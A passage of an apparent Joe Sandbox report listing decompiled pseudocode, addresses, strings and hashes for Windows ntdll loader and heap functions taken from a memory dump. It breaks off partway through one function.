                                                                                                                              0x1d7715c0
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              • LdrpInitializeTls, xrefs: 1D7B1851
                                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 1D7B185B
                                                                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 1D7B184A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                              • API String ID: 0-931879808
                                                                                                                              • Opcode ID: 2231962bf2957ba97a1290efe8a5cd1494b9dd7acd65632e625ee4a4d0d033ff
                                                                                                                              • Instruction ID: 195d38c0e52637c5c3669ed5e14cda2ceeae618f31040d35d6d97b2edf04fc28
                                                                                                                              • Opcode Fuzzy Hash: 2231962bf2957ba97a1290efe8a5cd1494b9dd7acd65632e625ee4a4d0d033ff
                                                                                                                              • Instruction Fuzzy Hash: 8D313975A00250FBDB148B48DC8AB6A72B9BB44778F010A69E90DA7190D770FD0087A2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7C1D5E Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 51%
                                                                                                                              			E1D7C1D5E(char __ecx) {
				char _v8;
				char _v12;
				signed char _t9;
				void* _t11;
				char _t20;

				_t9 =  *0x1d8337c0; // 0x0
				_t20 = __ecx;
				if((_t9 & 0x00000003) != 0) {
					E1D7BE692("minkernel\\ntdll\\ldrinit.c", 0x79d, "LdrpInitializationFailure", 0, "Process initialization failed with status 0x%08lx\n", __ecx);
					_t9 =  *0x1d8337c0; // 0x0
				}
				if((_t9 & 0x00000010) != 0) {
					asm("int3");
				}
				_t11 = E1D7C0371( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38, 0x1d7211f8);
				if( *0x1d835a9c == 0) {
					_v8 = _t20;
					_push( &_v12);
					_push(1);
					_push( &_v8);
					_push(0);
					_push(1);
					_push(0xc0000145);
					_t11 = E1D784020();
				}
				return _t11;
			}








                                                                                                                              0x1d7c1d63
                                                                                                                              0x1d7c1d6c
                                                                                                                              0x1d7c1d70
                                                                                                                              0x1d7c1d89
                                                                                                                              0x1d7c1d8e
                                                                                                                              0x1d7c1d93
                                                                                                                              0x1d7c1d98
                                                                                                                              0x1d7c1d9a
                                                                                                                              0x1d7c1d9a
                                                                                                                              0x1d7c1dac
                                                                                                                              0x1d7c1db8
                                                                                                                              0x1d7c1dbd
                                                                                                                              0x1d7c1dc0
                                                                                                                              0x1d7c1dc1
                                                                                                                              0x1d7c1dc6
                                                                                                                              0x1d7c1dc7
                                                                                                                              0x1d7c1dc9
                                                                                                                              0x1d7c1dcb
                                                                                                                              0x1d7c1dd0
                                                                                                                              0x1d7c1dd0
                                                                                                                              0x1d7c1dd7

                                                                                                                              Strings
                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 1D7C1D73
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 1D7C1D84
                                                                                                                              • LdrpInitializationFailure, xrefs: 1D7C1D7A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2986994758
                                                                                                                              • Opcode ID: da9d5161e7613c2761288fa34f52055f1438158e55f495102c07e20bd730bdbd
                                                                                                                              • Instruction ID: f71d39d825798c62410589cef92acb77887c3cb549075f93040a54c8a4e0ac5f
                                                                                                                              • Opcode Fuzzy Hash: da9d5161e7613c2761288fa34f52055f1438158e55f495102c07e20bd730bdbd
                                                                                                                              • Instruction Fuzzy Hash: 92F0F679900395BFD620D64CDC86FE93778EB05B74F900465FA0867282D6B0F900C693
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7C9567 Relevance: 3.1, APIs: 2, Instructions: 62timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: 3d86acdbf7702a2c823524b327f133285b7aafd8cbec1185a11b73eec38c5053
                                                                                                                              • Instruction ID: 891076c75ddc3a3aab3cba5c8234b1b866d1ee9128c9806d9c1012b79557f05b
                                                                                                                              • Opcode Fuzzy Hash: 3d86acdbf7702a2c823524b327f133285b7aafd8cbec1185a11b73eec38c5053
                                                                                                                              • Instruction Fuzzy Hash: 081123B2B04166AFDB058B5CD989B5EB6B8EB887B1F11007AE409E3340DB70DD00CB84
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D809ED2 Relevance: 2.8, Strings: 2, Instructions: 348COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 65%
                                                                                                                              			E1D809ED2(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v36;
				char _v40;
				signed int _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				char _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				char _v104;
				signed int _v108;
				signed int _v120;
				void* __ebx;
				signed int _t130;
				signed int _t133;
				void* _t134;
				signed int _t140;
				signed int _t144;
				signed int _t150;
				signed int _t162;
				intOrPtr* _t163;
				signed int _t171;
				signed int _t194;
				void* _t197;
				signed int _t200;
				signed int _t211;
				signed int _t212;
				signed int _t229;
				signed int _t236;
				signed int _t245;
				signed int _t248;
				void* _t252;
				void* _t256;
				signed int _t258;
				unsigned int* _t260;

				_t260 = __ecx;
				_v64 = __edx;
				_t245 = 0;
				_v100 = _v100 & 0;
				_v80 = 0;
				_push( *((intOrPtr*)(__ecx + 4)));
				_push( *((intOrPtr*)(__ecx)));
				_push(0);
				_t197 = 0x14;
				_t194 = E1D8094F9(_t197, _t197);
				if(_t194 == 0) {
					L63:
					__eflags = _v100;
					if(_v100 != 0) {
						_push(_t260[1]);
						_push( *_t260);
						_push(0x8000);
						E1D808845( &_v100,  &_v96);
					}
					goto L65;
				} else {
					_t229 = _a4;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t248 = 0;
					_v92 = 0;
					if(( *(__ecx + 0xc) & 0x04000000) != 0 && 0x1fffff - (_t229 - 0x00000001 & 0x001fffff) < _t229 >> 2) {
						_t248 = 1;
						_v92 = 1;
					}
					while(1) {
						_t200 = 0;
						_v76 = 0;
						if(_t248 == 0) {
							__eflags =  *_t260 >> 8 - 2;
							if( *_t260 >> 8 < 2) {
								__eflags = (_t229 & 0x000fffff) - 1 - 0xfefff;
								if((_t229 & 0x000fffff) - 1 <= 0xfefff) {
									_t200 = 1;
									__eflags = 1;
									_v76 = 1;
								}
							}
							_v84 = _v84 & 0x00000000;
							_t130 = (_t200 << 0xc) + _t229;
							__eflags = _t130;
						} else {
							_v84 = 0x200000;
							_t130 = _t229 - (_t229 - 0x00000001 & 0x001fffff) + 0x1fffff;
						}
						_v96 = _t130;
						if(_t130 < _t229) {
							break;
						}
						_t133 = _t260[3] & 0x40000000;
						asm("sbb edi, edi");
						_t252 = ( ~_t133 & 0x0000003c) + 4;
						if(_t133 != 0) {
							_push(0);
							_push(0x1c);
							_push( &_v60);
							_push(3);
							_push(_t260);
							_push(0xffffffff);
							if(E1D782BE0() < 0 || (_v56 & 0x00000060) == 0 || _v60 != _t260) {
								E1D805FED(0, _t260, 1, _v56, 0, 0);
								_t252 = 4;
							}
						}
						_t134 = E1D808009( &_v100,  &_v96, _v84, 0x2000, _t252,  *_t260, _t260[1]);
						_t277 = _t134;
						if(_t134 < 0) {
							_t114 =  &_v100;
							 *_t114 = _v100 & 0x00000000;
							__eflags =  *_t114;
							break;
						} else {
							_push(_t260[1]);
							_push( *_t260);
							E1D8096CB(_v100,  &_v68, _t277,  &_v88);
							 *_v80 = _t260;
							_t140 = _a4 + 0xfff >> 0xc;
							_v84 = _t140;
							_v96 = _t140 << 0xc;
							if(E1D7768EA(_t260[0x21] + _t260[0x14] << 0xc, _t260,  &(_t260[6])) == 0) {
								break;
							}
							_v96 = 0x1000;
							if(_v100 == 0) {
								__eflags = _a8 & 0x00000002;
								if((_a8 & 0x00000002) != 0) {
									_v96 = 0x40001000;
								}
							} else {
								_t241 = _v92;
								_v96 = 0x20001000;
								_t46 = _t241 - 1; // -1
								_v92 = _v92 + 0x1fffff - (_t46 & 0x001fffff);
							}
							_t144 = _t260[3] & 0x40000000;
							asm("sbb edi, edi");
							_t256 = ( ~_t144 & 0x0000003c) + 4;
							if(_t144 != 0) {
								_push(0);
								_push(0x1c);
								_push( &_v40);
								_push(3);
								_push(_t260);
								_push(0xffffffff);
								if(E1D782BE0() < 0 || (_v36 & 0x00000060) == 0 || _v40 != _t260) {
									E1D805FED(0, _t260, 1, _v36, 0, 0);
									_t256 = 4;
								}
							}
							if(E1D808009( &_v108,  &_v92, 0, _v96, _t256,  *_t260, _t260[1]) >= 0) {
								__eflags = _v100;
								if(_v100 != 0) {
									__eflags = _a8 & 0x00000002;
									if((_a8 & 0x00000002) != 0) {
										E1D788F40(_v108, 0, _a4);
									}
								}
								 *((intOrPtr*)(_t194 + 0xc)) = _v108;
								_t150 = _v84 + _v84;
								_t211 = ( *(_t194 + 0x10) & 0x00000ffd | _v80 << 0x0000000c) & 0xfffffffd | _t150;
								 *(_t194 + 0x10) = _t211;
								asm("bsf eax, [esp+0x14]");
								 *(_t194 + 0x10) = (_t150 << 0x00000002 ^ _t211) & 0x000000fc ^ _t211;
								 *((short*)(_t194 + 0xc)) = (_v80 << 0xc) - _v72;
								_t87 =  &_a8;
								 *_t87 = _a8 & 0x00000001;
								__eflags =  *_t87;
								if( *_t87 == 0) {
									L1D752330( &(_t260[0x10]),  &(_t260[0x10]));
								}
								_t236 =  &(_t260[0x11]);
								__eflags =  *(_t236 + 4) & 0x00000001;
								_t212 =  *_t236;
								if(( *(_t236 + 4) & 0x00000001) != 0) {
									__eflags = _t212;
									if(_t212 == 0) {
										_t212 = 0;
										__eflags = 0;
									} else {
										_t212 = _t212 ^ _t236;
									}
								}
								_t258 =  *(_t236 + 4) & 1;
								_v92 = 0;
								__eflags = _t212;
								if(_t212 == 0) {
									L52:
									L1D75EB80(_t236, _t212, _v92, _t194);
									__eflags = _a8;
									if(_a8 == 0) {
										E1D7524D0( &(_t260[0x10]));
									}
									asm("cdq");
									asm("lock xadd [eax], ecx");
									asm("lock xadd [eax], ecx");
									_t245 = _v108;
									_t194 = 0;
									_v108 = _v108 & 0;
									_t162 = E1D753C40();
									__eflags = _t162;
									if(_t162 == 0) {
										_t163 = 0x7ffe0388;
									} else {
										_t163 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
									}
									__eflags =  *_t163 - _t194;
									if( *_t163 == _t194) {
										L65:
										return _t245;
									} else {
										E1D7FDAAF(_t194, _t260, _t245, _v104);
										L61:
										__eflags = _t194;
										if(_t194 != 0) {
											E1D809629(_t194,  *_t260, _t260[1]);
										}
										goto L63;
									}
								} else {
									while(1) {
										__eflags = _v108 - ( *(_t212 + 0xc) & 0xffff0000);
										if(_v108 < ( *(_t212 + 0xc) & 0xffff0000)) {
											goto L46;
										}
										_t171 =  *(_t212 + 4);
										__eflags = _t258;
										if(_t258 == 0) {
											L44:
											__eflags = _t171;
											if(_t171 != 0) {
												L50:
												_t212 = _t171;
												continue;
											}
											L45:
											_v92 = 1;
											goto L52;
										}
										__eflags = _t171;
										if(_t171 == 0) {
											goto L45;
										}
										_t171 = _t171 ^ _t212;
										__eflags = _t171;
										goto L44;
										L46:
										_t171 =  *_t212;
										__eflags = _t258;
										if(_t258 == 0) {
											L49:
											__eflags = _t171;
											if(_t171 == 0) {
												L51:
												_v92 = 0;
												goto L52;
											}
											goto L50;
										}
										__eflags = _t171;
										if(_t171 == 0) {
											goto L51;
										}
										_t171 = _t171 ^ _t212;
										__eflags = _t171;
										goto L49;
									}
								}
							} else {
								if(_v100 == 0) {
									break;
								}
								_push(_t260[1]);
								_t248 = 0;
								_push( *_t260);
								_v100 = 0;
								_push(0x8000);
								E1D808845( &_v108,  &_v104);
								_v120 = _v120 & 0;
								_t229 = _a4;
								continue;
							}
						}
					}
					_t245 = _v80;
					goto L61;
				}
			}











































                                                                                                                              0x1d809ee0
                                                                                                                              0x1d809ee2
                                                                                                                              0x1d809ee6
                                                                                                                              0x1d809ee8
                                                                                                                              0x1d809eec
                                                                                                                              0x1d809ef0
                                                                                                                              0x1d809ef3
                                                                                                                              0x1d809ef5
                                                                                                                              0x1d809ef8
                                                                                                                              0x1d809f00
                                                                                                                              0x1d809f04
                                                                                                                              0x1d80a2b2
                                                                                                                              0x1d80a2b2
                                                                                                                              0x1d80a2b7
                                                                                                                              0x1d80a2b9
                                                                                                                              0x1d80a2c0
                                                                                                                              0x1d80a2c6
                                                                                                                              0x1d80a2cb
                                                                                                                              0x1d80a2cb
                                                                                                                              0x00000000
                                                                                                                              0x1d809f0a
                                                                                                                              0x1d809f0a
                                                                                                                              0x1d809f16
                                                                                                                              0x1d809f17
                                                                                                                              0x1d809f18
                                                                                                                              0x1d809f19
                                                                                                                              0x1d809f1a
                                                                                                                              0x1d809f1b
                                                                                                                              0x1d809f24
                                                                                                                              0x1d809f28
                                                                                                                              0x1d809f3a
                                                                                                                              0x1d809f3b
                                                                                                                              0x1d809f3b
                                                                                                                              0x1d809f3f
                                                                                                                              0x1d809f3f
                                                                                                                              0x1d809f41
                                                                                                                              0x1d809f47
                                                                                                                              0x1d809f6a
                                                                                                                              0x1d809f6c
                                                                                                                              0x1d809f76
                                                                                                                              0x1d809f7b
                                                                                                                              0x1d809f7f
                                                                                                                              0x1d809f7f
                                                                                                                              0x1d809f80
                                                                                                                              0x1d809f80
                                                                                                                              0x1d809f7b
                                                                                                                              0x1d809f84
                                                                                                                              0x1d809f8e
                                                                                                                              0x1d809f8e
                                                                                                                              0x1d809f49
                                                                                                                              0x1d809f4c
                                                                                                                              0x1d809f5e
                                                                                                                              0x1d809f5e
                                                                                                                              0x1d809f90
                                                                                                                              0x1d809f96
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d809f9f
                                                                                                                              0x1d809fa8
                                                                                                                              0x1d809fad
                                                                                                                              0x1d809fb2
                                                                                                                              0x1d809fb4
                                                                                                                              0x1d809fb6
                                                                                                                              0x1d809fbc
                                                                                                                              0x1d809fbd
                                                                                                                              0x1d809fbf
                                                                                                                              0x1d809fc0
                                                                                                                              0x1d809fc9
                                                                                                                              0x1d809fe6
                                                                                                                              0x1d809fed
                                                                                                                              0x1d809fed
                                                                                                                              0x1d809fc9
                                                                                                                              0x1d80a005
                                                                                                                              0x1d80a00a
                                                                                                                              0x1d80a00c
                                                                                                                              0x1d80a299
                                                                                                                              0x1d80a299
                                                                                                                              0x1d80a299
                                                                                                                              0x00000000
                                                                                                                              0x1d80a012
                                                                                                                              0x1d80a012
                                                                                                                              0x1d80a01d
                                                                                                                              0x1d80a024
                                                                                                                              0x1d80a02d
                                                                                                                              0x1d80a040
                                                                                                                              0x1d80a045
                                                                                                                              0x1d80a054
                                                                                                                              0x1d80a05f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d80a06a
                                                                                                                              0x1d80a072
                                                                                                                              0x1d80a094
                                                                                                                              0x1d80a098
                                                                                                                              0x1d80a09a
                                                                                                                              0x1d80a09a
                                                                                                                              0x1d80a074
                                                                                                                              0x1d80a074
                                                                                                                              0x1d80a07d
                                                                                                                              0x1d80a085
                                                                                                                              0x1d80a08e
                                                                                                                              0x1d80a08e
                                                                                                                              0x1d80a0a5
                                                                                                                              0x1d80a0ae
                                                                                                                              0x1d80a0b3
                                                                                                                              0x1d80a0b8
                                                                                                                              0x1d80a0ba
                                                                                                                              0x1d80a0bc
                                                                                                                              0x1d80a0c2
                                                                                                                              0x1d80a0c3
                                                                                                                              0x1d80a0c5
                                                                                                                              0x1d80a0c6
                                                                                                                              0x1d80a0cf
                                                                                                                              0x1d80a0ec
                                                                                                                              0x1d80a0f3
                                                                                                                              0x1d80a0f3
                                                                                                                              0x1d80a0cf
                                                                                                                              0x1d80a10f
                                                                                                                              0x1d80a145
                                                                                                                              0x1d80a14a
                                                                                                                              0x1d80a14c
                                                                                                                              0x1d80a150
                                                                                                                              0x1d80a15b
                                                                                                                              0x1d80a160
                                                                                                                              0x1d80a150
                                                                                                                              0x1d80a16a
                                                                                                                              0x1d80a180
                                                                                                                              0x1d80a185
                                                                                                                              0x1d80a187
                                                                                                                              0x1d80a18a
                                                                                                                              0x1d80a19b
                                                                                                                              0x1d80a1a9
                                                                                                                              0x1d80a1ad
                                                                                                                              0x1d80a1ad
                                                                                                                              0x1d80a1ad
                                                                                                                              0x1d80a1b1
                                                                                                                              0x1d80a1b7
                                                                                                                              0x1d80a1b7
                                                                                                                              0x1d80a1bc
                                                                                                                              0x1d80a1bf
                                                                                                                              0x1d80a1c3
                                                                                                                              0x1d80a1c5
                                                                                                                              0x1d80a1c7
                                                                                                                              0x1d80a1c9
                                                                                                                              0x1d80a1cf
                                                                                                                              0x1d80a1cf
                                                                                                                              0x1d80a1cb
                                                                                                                              0x1d80a1cb
                                                                                                                              0x1d80a1cb
                                                                                                                              0x1d80a1c9
                                                                                                                              0x1d80a1d5
                                                                                                                              0x1d80a1d8
                                                                                                                              0x1d80a1dd
                                                                                                                              0x1d80a1df
                                                                                                                              0x1d80a220
                                                                                                                              0x1d80a227
                                                                                                                              0x1d80a22c
                                                                                                                              0x1d80a230
                                                                                                                              0x1d80a236
                                                                                                                              0x1d80a236
                                                                                                                              0x1d80a23f
                                                                                                                              0x1d80a24f
                                                                                                                              0x1d80a25a
                                                                                                                              0x1d80a25e
                                                                                                                              0x1d80a262
                                                                                                                              0x1d80a264
                                                                                                                              0x1d80a268
                                                                                                                              0x1d80a26d
                                                                                                                              0x1d80a26f
                                                                                                                              0x1d80a281
                                                                                                                              0x1d80a271
                                                                                                                              0x1d80a27a
                                                                                                                              0x1d80a27a
                                                                                                                              0x1d80a286
                                                                                                                              0x1d80a288
                                                                                                                              0x1d80a2d0
                                                                                                                              0x1d80a2d8
                                                                                                                              0x1d80a28a
                                                                                                                              0x1d80a292
                                                                                                                              0x1d80a2a2
                                                                                                                              0x1d80a2a2
                                                                                                                              0x1d80a2a4
                                                                                                                              0x1d80a2ad
                                                                                                                              0x1d80a2ad
                                                                                                                              0x00000000
                                                                                                                              0x1d80a2a4
                                                                                                                              0x00000000
                                                                                                                              0x1d80a1e1
                                                                                                                              0x1d80a1e9
                                                                                                                              0x1d80a1ed
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d80a1ef
                                                                                                                              0x1d80a1f2
                                                                                                                              0x1d80a1f4
                                                                                                                              0x1d80a1fc
                                                                                                                              0x1d80a1fc
                                                                                                                              0x1d80a1fe
                                                                                                                              0x1d80a217
                                                                                                                              0x1d80a217
                                                                                                                              0x00000000
                                                                                                                              0x1d80a217
                                                                                                                              0x1d80a200
                                                                                                                              0x1d80a200
                                                                                                                              0x00000000
                                                                                                                              0x1d80a200
                                                                                                                              0x1d80a1f6
                                                                                                                              0x1d80a1f8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d80a1fa
                                                                                                                              0x1d80a1fa
                                                                                                                              0x00000000
                                                                                                                              0x1d80a207
                                                                                                                              0x1d80a207
                                                                                                                              0x1d80a209
                                                                                                                              0x1d80a20b
                                                                                                                              0x1d80a213
                                                                                                                              0x1d80a213
                                                                                                                              0x1d80a215
                                                                                                                              0x1d80a21b
                                                                                                                              0x1d80a21b
                                                                                                                              0x00000000
                                                                                                                              0x1d80a21b
                                                                                                                              0x00000000
                                                                                                                              0x1d80a215
                                                                                                                              0x1d80a20d
                                                                                                                              0x1d80a20f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d80a211
                                                                                                                              0x1d80a211
                                                                                                                              0x00000000
                                                                                                                              0x1d80a211
                                                                                                                              0x1d80a1e1
                                                                                                                              0x1d80a111
                                                                                                                              0x1d80a116
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d80a11c
                                                                                                                              0x1d80a11f
                                                                                                                              0x1d80a125
                                                                                                                              0x1d80a12b
                                                                                                                              0x1d80a12f
                                                                                                                              0x1d80a134
                                                                                                                              0x1d80a139
                                                                                                                              0x1d80a13d
                                                                                                                              0x00000000
                                                                                                                              0x1d80a13d
                                                                                                                              0x1d80a10f
                                                                                                                              0x1d80a00c
                                                                                                                              0x1d80a29e
                                                                                                                              0x00000000
                                                                                                                              0x1d80a29e

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: `$`
                                                                                                                              • API String ID: 0-197956300
                                                                                                                              • Opcode ID: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                                                                              • Instruction ID: d3aa45b5bdcbceff0b3f74be3ce6779ec42bbc42df196c78a5853ae324e96fed
                                                                                                                              • Opcode Fuzzy Hash: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                                                                              • Instruction Fuzzy Hash: E2C1BD312083469BE715CF28CC41B6BBBE5FF88714F058A2DF5968B2A0D775E945CB42
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7C174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 56%
                                                                                                                              			E1D7C174B(void* __ecx) {
				intOrPtr _v12;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				signed int _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v92;
				signed int* _v96;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				char _v112;
				intOrPtr _v120;
				char _v124;
				char _v128;
				intOrPtr _v136;
				char _v140;
				char _v141;
				void* _t108;
				signed int _t109;
				intOrPtr _t115;
				void* _t162;
				intOrPtr* _t164;
				intOrPtr* _t165;
				char _t167;
				void* _t170;
				void* _t171;
				intOrPtr _t174;
				char _t179;
				intOrPtr _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				char _t186;
				void* _t190;
				void* _t192;
				signed int _t194;
				void* _t196;
				signed int _t197;
				signed int _t198;
				void* _t200;
				signed int* _t203;

				_t171 = __ecx;
				_t183 =  *((intOrPtr*)( *[fs:0x30] + 8));
				_t167 = 0;
				_t200 = 0;
				_t194 =  *(__ecx + 6) & 0x0000ffff;
				_t108 = ( *(__ecx + 0x14) & 0x0000ffff) + 0x2c;
				_v141 = 0;
				_v104 = _t183;
				if(_t194 == 0) {
					L7:
					_t109 =  *(_t171 + 0xac);
					if(_t109 == 0) {
						L15:
						_t184 =  *((intOrPtr*)(_t171 + 0x9c));
						if(_t184 != 0) {
							_t162 =  *((intOrPtr*)(_t171 + 0x98)) + _t184;
							if(_t162 > _t200) {
								_t200 = _t162;
							}
						}
						_push(0);
						_push(0x30);
						_push( &_v52);
						_push(0x25);
						_push(0xffffffff);
						if(E1D782B20() < 0) {
							L44:
							return _t167;
						} else {
							_t22 = _t200 + 0x2000; // 0x2000
							if(_t22 >= _v12) {
								goto L44;
							}
							_t115 =  *0x1d835b24; // 0x1ab2b50
							_t25 = _t115 + 0x28; // 0x1ab1c10
							if(E1D761BA0(_t171,  *_t25,  &_v84, 0, 0) == 0) {
								goto L44;
							}
							_v72 = _v72 & 0x00000000;
							_v60 = _v60 & 0x00000000;
							_v56 = _v56 & 0x00000000;
							_push(0x60);
							_v68 =  &_v84;
							_push(5);
							_push( &_v92);
							_v76 = 0x18;
							_push( &_v76);
							_push(0x100001);
							_v64 = 0x40;
							_push( &_v128);
							if(E1D782CE0() < 0) {
								L43:
								E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v80);
								goto L44;
							}
							_push(0);
							_v136 = 0;
							_v140 = _v12 + 0xfffffffc;
							_push( &_v140);
							_t196 = 4;
							_push(_t196);
							_push( &_v112);
							_push( &_v92);
							_push(0);
							_push(0);
							_push(0);
							_push(_v128);
							if(E1D7829F0() < 0) {
								L42:
								_push(_v128);
								E1D782A80();
								goto L43;
							}
							_t185 = _v112;
							_t174 = _v12;
							if(_t185 < _t196 || _t185 + 4 > _t174) {
								L32:
								if(_t185 + 0xc > _t174) {
									goto L42;
								}
								_v140 = _t174 - _t185 - 0xc;
								_push(0);
								_push( &_v140);
								_push(8);
								_v136 = 0;
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E1D7829F0() < 0) {
									goto L42;
								}
								if(_v120 == 0x44646441) {
									goto L38;
								}
								_t179 = _v124;
								_t78 = _t179 + 4; // 0x103
								if(_t78 > _v12) {
									goto L42;
								}
								_v140 = _t179;
								_push(0);
								_push( &_v140);
								_push(_t196);
								_v136 = 0;
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E1D7829F0() < 0 || _v124 != 0x44646441) {
									goto L42;
								} else {
									goto L38;
								}
							} else {
								_push(0);
								_v140 = _t185 - 4;
								_push( &_v140);
								_push(8);
								_v136 = 0;
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E1D7829F0() < 0) {
									goto L42;
								}
								if(_v120 == 0x44646441) {
									L38:
									_t167 = 1;
									_v108 = _v108 & 0x00000000;
									_t203 = E1D74A86F(_v104);
									if(_t203 != 0 &&  *_t203 >= 0x48) {
										_v96 = _t203;
										_v108 =  *_t203;
										_push( &_v100);
										_push(_t196);
										_push( &_v108);
										_push( &_v96);
										_push(0xffffffff);
										if(E1D782EB0() >= 0) {
											_t203[0x10] = _t203[0x10] & 0x00000000;
											_t203[0x11] = _t203[0x11] & 0x00000000;
											_push( &_v100);
											_push(_v100);
											_push( &_v108);
											_push( &_v96);
											_push(0xffffffff);
											E1D782EB0();
										}
									}
									goto L42;
								}
								_t186 = _v124;
								_t174 = _v12;
								_t59 = _t186 + 4; // 0x103
								if(_t59 > _t174) {
									L31:
									_t185 = _v112;
									goto L32;
								}
								_v140 = _t186;
								_push(0);
								_v136 = 0;
								_push( &_v140);
								_push(_t196);
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E1D7829F0() < 0) {
									goto L42;
								}
								if(_v124 == 0x44646441) {
									goto L38;
								}
								_t174 = _v12;
								goto L31;
							}
						}
					}
					_t170 =  *((intOrPtr*)(_t171 + 0xa8)) + _t183;
					_t197 = 0x1c;
					_t198 = _t109 / _t197;
					if(_t198 == 0) {
						L14:
						_t167 = _v141;
						goto L15;
					}
					_t164 = _t170 + 0x18;
					do {
						if( *((intOrPtr*)(_t164 - 8)) != 0) {
							_t190 =  *_t164 +  *((intOrPtr*)(_t164 - 8));
							if(_t190 > _t200) {
								_t200 = _t190;
							}
						}
						_t164 = _t164 + 0x1c;
						_t198 = _t198 - 1;
					} while (_t198 != 0);
					goto L14;
				} else {
					_t165 = _t108 + __ecx;
					do {
						if( *((intOrPtr*)(_t165 - 4)) != 0) {
